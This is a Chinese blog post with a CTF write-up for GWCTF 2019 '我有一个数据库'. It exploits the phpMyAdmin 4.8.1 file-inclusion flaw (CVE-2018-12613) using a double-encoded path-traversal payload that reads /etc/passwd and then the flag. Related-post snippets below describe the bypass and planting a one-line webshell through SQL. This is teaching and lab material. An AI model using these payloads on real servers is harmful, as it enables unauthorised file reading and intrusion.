phpmyadmin4.8.1远程文件包含漏洞 [GWCTF 2019]我有一个数据库1

最新推荐文章于 2024-01-26 08:46:38 发布
最新推荐文章于 2024-01-26 08:46:38 发布
阅读量604 收藏 8
点赞数 6
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/135050321
版权

打开题目

我们用dirsearch扫描一下后台看看

扫描结果如下

我们访问一下robots.txt看看,提示有phpinfo.php

那我们访问一下phpinfo.php

发现没有任何信息后我们转去看看phpmyadmin看看

成功访问到页面

在这里我们看到phpmyadmin的版本号是4.8.1

我们百度搜索一下看看

我们知道phpmyadmin4.8.1存在远程文件包含漏洞

输入​/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

可以看到能够成功执行

那我们尝试一下直接寻找flag

​/index.php?target=db_sql.php%253f/../../../../../../../../flag

直接就得到了flag

知识点:

CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现

参考:

phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)_phpmyadmin cve-2018-12613漏洞获取webshell-CSDN博客

 

访白鹿
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件包含漏洞--phpMyAdmin 4.8.1
xiesiyuan1的博客
02-16 1098
需要同时满足条件(参数target不为空、是字符串、不以index开头(此时如果需要加载index文件去绕过,可尝试使用xxx/../index.php)、不在数组target_blacklist中(此处也可以用xxx/../index.php的方式绕过 )、在checkPageValidity()函数中返回真)才能得到参数。因为此靶场可以对数据库直接操作,我们可以直接查找数据库文件(/MySql/data/数据库名/表名.frm),并且直接新建表,将字段名命名为一句话木马,从而将一句话木马包含进去。
phpmyadmin后台文件包含漏洞分析
nareku的博客
04-10 5949
前言 在墨者学院看到这道题给的标签是文件包含,就想着拿来练练手,果然不练不知道一练吓一跳,里面还是有很多我没学到和不懂的知识,所以就打算单独拿出来写一篇博客来记录一下。
phpmyadminV4.8.1本地文件包含漏洞复现
seek_2022的博客
07-05 2851
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含漏洞,通过代码审计结合本地搭建测试环境的方式进行漏洞复现研究,以供大家参考学习。
漏洞复现-phpmyadmin-文件包含】CVE-2014-8959
10-14 2716
phpmyadmin-文件包含】鸡肋
phpmyadmin-文件包含漏洞代码审计过程(超详细)
最新发布
qq_59020256的博客
01-26 1181
phpmyadmin-文件包含漏洞
phpmyadmin 远程文件包含漏洞(CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
phpMyAdmin v4.8.1
10-12
phpMyAdmin一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具。phpMyAdmin 可以管理整个MySQL服务器(需要超级用户),也可以管理单个数据库。为了实现后一种,你将
如何解决phpmyadmin导入数据库文件最大限制2048KB
12-19
在使用PHPMyAdmin管理MySQL数据库时,可能会遇到一个常见的问题,即当尝试导入大型数据库文件时,系统会提示“导入数据库文件最大限制2048KB”。这是因为PHP默认设置对上传文件大小和内存使用有限制。以下是解决这个...
phpMyAdmin4.8.1
07-06
phpMyAdmin一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料...
phpMyAdmin 4.8.1 本地文件包含漏洞复现
weixin_51681694的博客
04-22 518
漏洞点在根目录下的index.php中的61行target传参可任意控制,控制index.php包含任意文件上面的if条件需要满足target且为且且中黑名单:查看最后一个条件,需要返回true第一个红框定义白名单第二个红框检查文件名是否在白名单中,在则返回true第三个红框将原传入字符串从0到?前分割出来,再检查字符串是否在白名单中,在则返回true可以考虑设置字符串内容?之前的字符串为白名单,绕过过滤,可是?不能出现在文件名中最后则是利用点。
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
千寻的博客
03-14 1148
phpMyAdminphpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。攻击者可利用该漏洞包含(查看并可能执行)服务器上的文件。
phpmyadmin文件包含漏洞复现(CVE-2018-12613)
feng的博客
05-04 1138
前言 一个非常经典的漏洞了,以前只是直接拿payload打,还没认真的在本地复现过,看过漏洞的代码到底是怎么回事,所以今天从github上下载phpmyadmin4.8.1,到vps上然后复现一波,看一下代码的问题。 复现 漏洞出现在index.php的第61行: 存在任意文件包含,但是需要进入if才可以。 一层一层的来看,首先target不为空,而且是字符串,这很容易满足,而且不以index开头,而且不在黑名单中: $target_blacklist = array ( 'import.php'
CVE-2018-12613 PHPmyadmin文件包含漏洞分析及漏洞利用
凝聚力安全团队
11-20 4187
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固 漏洞描述    影响版本 漏洞环境搭建 漏洞分析 漏洞利用 漏洞加固
CVE-2018-12613 PhpMyadmin后台文件包含分析
热门推荐
3569
06-27 1万+
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞.描述:一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外:$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制...
phpmyadmin文件包含
rede
04-22 435
phpmyadmin文件包含 CVE-2018-12613 — 本地文件包含造成远程代码执行漏洞复现,其实就是我们常见的LFI漏洞。在我前面写的博客里面又详细介绍。这次我们直接进入墨者学院进行复现,不再自行搭建环境。 进入环境 这里使用弱口令进入,账号root,密码root。 进入之后页面如下: 执行sql语句挂入一句话木马 进入SQL执行页面 点击执行。 使用中国菜刀连接服务器 在根...
phpMyAdmin后台文件包含分析溯源
asd158923328的博客
08-20 1475
靶场地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 根据题意 进入访问页 弱口令进入,账号root,密码root 进入SQL执行 使用菜刀连接服务器 在根目录下我们发现key.txt文件 打开查看 ...
phpmyadmin文件包含漏洞
Hydra的博客
10-21 940
http://139.199.31.116:9008/index.php?target=db_sql.php%253f/../../../../../../flag.txt  
CVE-2018-12613 phpmyadmin 4.8.1 远程文件包含漏洞
weixin_51387754的博客
12-07 2782
漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞漏洞环境 执行如下命令,启动phpmyadmin 4.8.1: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可进入phpmyadmin。配置的是“config”模式,所以无需输入密码,直接登录test账户。 漏洞复现 访问http://your-ip:8080/index.ph
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值